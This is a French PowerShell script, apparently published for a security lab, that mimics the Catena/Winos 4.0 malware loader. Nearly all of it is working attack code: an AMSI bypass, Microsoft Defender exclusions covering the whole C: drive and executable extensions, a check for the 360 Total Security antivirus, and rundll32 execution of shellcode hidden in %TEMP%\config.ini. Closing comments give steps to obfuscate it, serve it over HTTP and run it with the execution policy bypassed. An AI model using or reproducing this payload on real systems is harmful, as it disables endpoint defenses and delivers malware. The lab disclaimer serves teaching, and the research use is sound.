# payload.ps1 - Catena/Winos 4.0 PowerShell Payload # Simule les techniques d'évasion et d'exécution de Catena # À utiliser UNIQUEMENT dans un lab sécurisé (article 323-1 CP) # Par Platon-Y pour PCtamalou.fr/catcatcat/ # Désactive AMSI (Antimalware Scan Interface) pour éviter la détection # AMSI scanne les scripts PowerShell en temps réel [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true) # Ajoute des exclusions Defender pour le disque C: et les extensions courantes # Simule la désactivation des défenses antivirus Add-MpPreference -ExclusionPath "C:\" Add-MpPreference -ExclusionExtension ".exe",".dll",".ini" # Vérifie la présence de 360 Total Security # Catena adapte son comportement selon les AV installés $360 = Get-Process | Where-Object { $_.Name -like "*360*" } if ($360) { Write-Host "360 Total Security détecté. Procéder avec prudence." } else { Write-Host "Aucun 360 Total Security détecté. Exécution sécurisée." } # Exécute le shellcode via rundll32 # Simule le lancement du payload Winos 4.0 Start-Process rundll32.exe -ArgumentList "%TEMP%\config.ini, #1" # Instructions d'utilisation : # 1. Obfusque avec Invoke-Obfuscation : # git clone https://github.com/danielbohannon/Invoke-Obfuscation # ./Invoke-Obfuscation.ps1 -ScriptPath payload.ps1 -OutputFile obf_payload.ps1 # 2. Transfère via HTTP : # sudo python3 -m http.server 80 (sur Kali) # Invoke-WebRequest -Uri http://192.168.1.6/obf_payload.ps1 -OutFile obf_payload.ps1 (sur Windows) # 3. Exécute : powershell -ExecutionPolicy Bypass -File obf_payload.ps1 # 4. Assure-toi que shellcode.bin est dans %TEMP%\config.ini